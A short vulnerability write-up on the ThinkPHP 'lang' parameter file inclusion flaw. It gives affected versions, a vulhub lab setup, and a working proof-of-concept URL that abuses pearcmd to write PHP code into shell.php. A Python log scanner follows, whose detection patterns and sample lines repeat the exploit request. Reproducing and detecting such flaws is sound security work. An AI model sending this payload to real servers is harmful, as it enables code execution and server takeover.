ThinkPHP LoadLangPack lang arbitrary file inclusion vulnerability
Vulnerability Description
When a ThinkPHP application has the multilingual feature enabled, the language parameter can be passed through GET, header, cookie and other locations. An attacker can use it to include the pearcmd file, achieve command execution and obtain server permissions.
Vulnerability Impact
ThinkPHP v6.0.1 ~ v6.0.13, v5.0.x, v5.1.x
Environment setup
docker pull vulhub/thinkphp:6.0.12
Vulnerability reproduction
Main page
Verify POC
/public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php
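A defender-side check for this request pattern, as an added example that is not part of the original post: it scans access-log lines and flags any lang query value that is not a plain language tag. The log lines are constructed, the combined log format and the allow-list pattern are assumptions, and the parameter name lang is taken from the request above; values sent in a header or cookie are only visible if those fields are logged.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: the query variable is named "lang", as in the request above.
LANG_PARAM = "lang"
# Assumed allow-list for a legitimate language tag such as "zh-cn" or "en-us".
LANG_OK = re.compile(r"[A-Za-z0-9_-]{1,20}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def lang_findings(value):
    """Return the reasons a lang value is suspicious (empty list if clean)."""
    reasons = []
    if not LANG_OK.fullmatch(value):
        reasons.append("not a plain language tag")
    if ".." in value or "/" in value or "\\" in value:
        reasons.append("path traversal characters")
    if "pearcmd" in value.lower():
        reasons.append("references pearcmd")
    return reasons


def scan(log_lines):
    """Return (line_number, lang_value, reasons) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        # parse_qsl percent-decodes, so encoded traversal is checked decoded.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == LANG_PARAM and lang_findings(value):
                hits.append((number, value, lang_findings(value)))
    return hits


# Constructed sample log lines (not captured traffic).
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2023:10:00:00 +0000] "GET /public/index.php?lang=zh-cn HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2023:10:00:05 +0000] "GET /public/index.php?+config-create+/&lang=../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php HTTP/1.1" 200 931',
    '203.0.113.7 - - [01/Jan/2023:10:00:09 +0000] "GET /public/index.php?lang=%2e%2e%2fconfig HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, value, reasons in scan(SAMPLE):
        print(f"line {number}: lang={value!r} -> {', '.join(reasons)}")
```

The same allow-list test can be applied to the lang value at a reverse proxy or WAF before the request reaches the application.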
This post is licensed under CC BY 4.0 by the author.